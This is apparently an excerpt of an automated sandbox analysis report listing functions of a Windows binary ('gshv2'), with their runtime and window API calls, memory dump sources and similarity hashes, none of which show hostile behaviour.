APIs

Part of subcall function 00007FF62C0A28F0: memset.VCRUNTIME140(?,?,?,00007FF62C0A1C58), ref: 00007FF62C0A2A03

memset.VCRUNTIME140 ref: 00007FF62C0A20FA

Part of subcall function 00007FF62C0C0270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0C02A7
Part of subcall function 00007FF62C0C0270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0C02D6
Part of subcall function 00007FF62C0C0270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0C0305

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A21E0
memset.VCRUNTIME140 ref: 00007FF62C0A24C0
memset.VCRUNTIME140 ref: 00007FF62C0A24F0

Strings

##Overlay, xrefs: 00007FF62C0A23D6

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memset$free$malloc
String ID: ##Overlay
API String ID: 1393892039-3248624929
Opcode ID: 9dd30a4d501a35a45c045f94b2b6f92fb818b1d5ac0612a8ce2ede0dd92a826a
Instruction ID: 5db7cf3967bca2b0a7581b7e26e3b287b53d7ead32451b5b0c6335c2d47c2bd2
Opcode Fuzzy Hash: 9dd30a4d501a35a45c045f94b2b6f92fb818b1d5ac0612a8ce2ede0dd92a826a
Instruction Fuzzy Hash: F432C273105BC186D3109F29A8441CA37E8F745F68F284B39EEA40BB98DF3585A1E779

Function 00007FF62C0B9170 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B92B4
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B92D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B93DF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B9400
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B9470

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free$floorf
String ID:
API String ID: 2402160083-0
Opcode ID: 8447988f2d2875be732f2f4e82d0f1f8e8f85b208db9797200ea177815ed5302
Instruction ID: f6faf4784f4f8464dcce02143e5c63b1d0ac8a0024a6bd5036e2ac476b78803c
Opcode Fuzzy Hash: 8447988f2d2875be732f2f4e82d0f1f8e8f85b208db9797200ea177815ed5302
Instruction Fuzzy Hash: 7D716132A18BC586DA21CF26A8403EAB3A4FF9D790F144236EF8C53765DF39E551CA01

Function 00007FF62C0BE3A0 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BE3DD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BE49D
memcpy.VCRUNTIME140 ref: 00007FF62C0BE4BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BE4E3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0BE5B3
memcpy.VCRUNTIME140 ref: 00007FF62C0BE5C9

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: malloc$memcpy$free
String ID:
API String ID: 2877244841-0
Opcode ID: 41962eec364636121f420d1a6d4b789836b7c491c0d4585868936a7d201724ca
Instruction ID: 1b40f12c619c8b8706f12c077c64db9d509e9e87def99af2a52ea228b084d58a
Opcode Fuzzy Hash: 41962eec364636121f420d1a6d4b789836b7c491c0d4585868936a7d201724ca
Instruction Fuzzy Hash: AA618E72A09B8186EF44CF25D9803B8A3A4FB48B54F18A235CF8D87356EF39E591C341

Function 00007FF62C0CF450 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF575
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF587
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF5C6
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF5DF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF604

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2665656946-0
Opcode ID: e0e760df61f22dcbcc095a072f92cc21ecaa7102169e5a0241f88aba0943b92c
Instruction ID: 9b169b1074d6eff334a6a23e70bdd91998d4e9a7128231b2cd44a8c36cae3847
Opcode Fuzzy Hash: e0e760df61f22dcbcc095a072f92cc21ecaa7102169e5a0241f88aba0943b92c
Instruction Fuzzy Hash: 1041D6B1B14B9641EE04DB12ED042A867A1FB48BD0F548532DE5D87B99EF3EE292C301

Function 00007FF62C0B1C80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00007FF62C0B1CB9
ImmSetCompositionWindow.IMM32 ref: 00007FF62C0B1CDF
ImmReleaseContext.IMM32 ref: 00007FF62C0B1CEB

Strings

, xrefs: 00007FF62C0B1CD7

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Context$CompositionReleaseWindow
String ID:
API String ID: 244372355-3916222277
Opcode ID: f0608f4d2f5933758a6dba6cc5a7e80ddc8d2399835f5879a227162c55a92b4e
Instruction ID: 4c85c748c4bb24b1d681407358b3bf360bcfe92ffb8bc2a2b0f4287ee20f597c
Opcode Fuzzy Hash: f0608f4d2f5933758a6dba6cc5a7e80ddc8d2399835f5879a227162c55a92b4e
Instruction Fuzzy Hash: B0017C32A08B4182EE208B06AD14269B7A1FB8CBA0F084135DE8D83755EF3DE8458B01

Function 00007FF62C0D0F00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00007FF62C0D0F35
__current_exception_context.VCRUNTIME140 ref: 00007FF62C0D0F49
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0D0F51

Strings

csm, xrefs: 00007FF62C0D0F21

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 13a3738c5717a9776ea31623ac55d36df50be0d8933bcdc5182b4c2b4034302b
Instruction ID: 1ffb20a8cbc01baa8751fadc96d538afc456d9d191be819b3797d0ed85c1fa4d
Opcode Fuzzy Hash: 13a3738c5717a9776ea31623ac55d36df50be0d8933bcdc5182b4c2b4034302b
Instruction Fuzzy Hash: D0F0E237609B45CACB149F21EC808AC3368F788BACB5A5120FA8D87B55CF39D8908381

Function 00007FF62C0C3020 Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 420COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF62C0C3186
memchr.VCRUNTIME140 ref: 00007FF62C0C3242
memchr.VCRUNTIME140 ref: 00007FF62C0C333E

Strings

..., xrefs: 00007FF62C0C3025

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memchr
String ID: ...
API String ID: 3297308162-440645147
Opcode ID: 3dae8871612b2a89ec93fbdb0c08a60a2257346372f36b2541edb1c00f37e8f3
Instruction ID: 7a0f201a6d83a7bf7317b667d81ed55ff839d5e8f30f5eb47c599ab4393598dd
Opcode Fuzzy Hash: 3dae8871612b2a89ec93fbdb0c08a60a2257346372f36b2541edb1c00f37e8f3
Instruction Fuzzy Hash: 0012F732D187C985EB528B3694013F9B350EF6D7A4F189731EE5C726E1EF6AA2C18701

Function 00007FF62C0B11A0 Relevance: 6.3, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B122D
memcpy.VCRUNTIME140 ref: 00007FF62C0B124F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1279
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1303
memcpy.VCRUNTIME140 ref: 00007FF62C0B1312

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: mallocmemcpy$free
String ID:
API String ID: 798594229-0
Opcode ID: b8b578794c7d36ea2b17c3b35c4d525053bef2f43740608f7bc378a7882012d3
Instruction ID: 2560fbd62d1397820539100a19491fcc6d4c12b53847110724ecd2131c6a23c2
Opcode Fuzzy Hash: b8b578794c7d36ea2b17c3b35c4d525053bef2f43740608f7bc378a7882012d3
Instruction Fuzzy Hash: 97416E72A09B8286EF50CF2598401A963B1FF88BA4F185136DF5DC7789DF39E941C712

Function 00007FF62C0B1E30 Relevance: 6.3, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1E9C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1ED4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1F02
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1F30
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B1F58

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 646be602e9afab55660837a51764879d3b31e86ed7a86cc8f653ddaadadcf76d
Instruction ID: 5a3b2d07b87b06c22cbf61c9873f1cf4d8eb4ff9d75b5721a7b31763889119a0
Opcode Fuzzy Hash: 646be602e9afab55660837a51764879d3b31e86ed7a86cc8f653ddaadadcf76d
Instruction Fuzzy Hash: B0413232A0AB4682EF14CF15DC8017973A0FF84FA0B589536DA1C87799CF3AE9418392

Function 00007FF62C0B2720 Relevance: 6.3, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF62C0BDF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2742,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BDF9D
Part of subcall function 00007FF62C0BDF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2742,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE040
Part of subcall function 00007FF62C0BDF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2742,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE06F

Part of subcall function 00007FF62C0BE0A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B274A,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE0CB
Part of subcall function 00007FF62C0BE0A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B274A,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE0F2

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B2784
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B27BE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B27ED
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B2815
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B283D

Part of subcall function 00007FF62C0C01E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2768,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0C0211
Part of subcall function 00007FF62C0C01E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2768,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0C0239
Part of subcall function 00007FF62C0C01E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2768,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0C0261

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a0b8fa40c367be0cf4d550eb261d47adfa5e76108d3e1fc670166add5441dcf8
Instruction ID: 165a7f08878da1c48c6be02526f74cf450173c50f5b2254799bae07d027ad974
Opcode Fuzzy Hash: a0b8fa40c367be0cf4d550eb261d47adfa5e76108d3e1fc670166add5441dcf8
Instruction Fuzzy Hash: 82311525A4AB5681EE54DF26D84037A2360FF89FA0F186036DE0D87799CF3EE6418357

Function 00007FF62C0B2870 Relevance: 6.3, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A6848), ref: 00007FF62C0B28A3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A6848), ref: 00007FF62C0B28EA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A6848), ref: 00007FF62C0B2930
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A6848), ref: 00007FF62C0B295B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A6848), ref: 00007FF62C0B2986

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6228c0cfdfe3ab49fe997581f9682be4996bc7aeb1284bb124064aeaf8cfc7f5
Instruction ID: 8cceed17b88c63174044878431b925ea9b593565cd476c8cc802f8611835a1b3
Opcode Fuzzy Hash: 6228c0cfdfe3ab49fe997581f9682be4996bc7aeb1284bb124064aeaf8cfc7f5
Instruction Fuzzy Hash: 6E312921A1B74685FE958B25DC402B82360FF89FA0F586536CE0D973A9CF2EE9408313

Function 00007FF62C0A4750 Relevance: 6.3, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A477E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A47A9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A47D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A47FF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A482A

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2b164cdf6d23274124befa53a59eee3137ed5b334b6df2f071558036e7f35e91
Instruction ID: 4ca46c5bbd34ceb1abdd68c27a79d9cdc0ec23224a7c00e9d5e94296918f1fbb
Opcode Fuzzy Hash: 2b164cdf6d23274124befa53a59eee3137ed5b334b6df2f071558036e7f35e91
Instruction Fuzzy Hash: 60210E64B5B74681FE558BA1DC4037D2260FF85FA0F58A436CE0D87795CF2EE6418613

Function 00007FF62C0B72E0 Relevance: 6.1, APIs: 4, Instructions: 134COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B7406
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B743A
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B746F
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF62C0B749A

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ceilffloorf
String ID:
API String ID: 300201839-0
Opcode ID: 07f66ec4dab02e98ce517c4298ca87a1a4658cb6173b60d4227201da63bce10f
Instruction ID: f78778885a7b4035264e9d994a13c416671ce8b9ee1f7d3d583c260c04d5bb56
Opcode Fuzzy Hash: 07f66ec4dab02e98ce517c4298ca87a1a4658cb6173b60d4227201da63bce10f
Instruction Fuzzy Hash: CD51EA23618BD485D762DF3594403ADB7A4EFA9751F498336EA8CA3355DF39E880CB10

Function 00007FF62C0CEA30 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,00007FF62C0A101D), ref: 00007FF62C0CEA67
memcpy.VCRUNTIME140(?,?,?,00007FF62C0A101D), ref: 00007FF62C0CEB23
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF62C0A101D), ref: 00007FF62C0CEB7E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62C0CEB8B

Part of subcall function 00007FF62C0CFC70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0CEAE6,?,?,?,00007FF62C0A101D), ref: 00007FF62C0CFC8A

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: 87a7451410f5fb63623433a971c407ef3b6f3f88013bee35b0aadba9137e9e77
Instruction ID: e8326f78832a6c2f753399b207d15f6c841ae434d5b88777147f1f10bdbdfc00
Opcode Fuzzy Hash: 87a7451410f5fb63623433a971c407ef3b6f3f88013bee35b0aadba9137e9e77
Instruction Fuzzy Hash: 31311222B09AC288FE149B11D95437E2251EB45FF4F540631DA3E87BC5DF3EE6808352

Function 00007FF62C0AC370 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0AC3EE
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0AC400
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0AC408
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0AC46F

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: __acrt_iob_funcfclosefflushfree
String ID:
API String ID: 4015754604-0
Opcode ID: 79fb6fafe272ffb90f3c222bc48b96549a04a781a1814ccba7638e812087eed5
Instruction ID: 8829e90ce55c7ddf70075ba7df96f43828ccf48968bec9791e8c2e8379b6bff4
Opcode Fuzzy Hash: 79fb6fafe272ffb90f3c222bc48b96549a04a781a1814ccba7638e812087eed5
Instruction Fuzzy Hash: FA417C72A09B8285EF14CF21E8802BD73A0FB85B94F494436DF5C87659DF3EE4909712

Function 00007FF62C0CE070 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00007FF62C0CE0A4
GetWindowLongA.USER32 ref: 00007FF62C0CE0DA
MoveWindow.USER32 ref: 00007FF62C0CE142
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE15A

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Window$LongMoveRectexit
String ID:
API String ID: 2994184003-0
Opcode ID: bb1b18cb9d7b8e4d22c257bbf5248be40e4a71518151bf2fc581d29680595bda
Instruction ID: 0b78f3873096a744e5ce51f364fbf1e5a2dc58d253906d4267bd755ee0d3ab7b
Opcode Fuzzy Hash: bb1b18cb9d7b8e4d22c257bbf5248be40e4a71518151bf2fc581d29680595bda
Instruction Fuzzy Hash: FB21B374E186828AFF148F29AD446243BA0FB58760F448679D92DC2764DF3EB584CA12

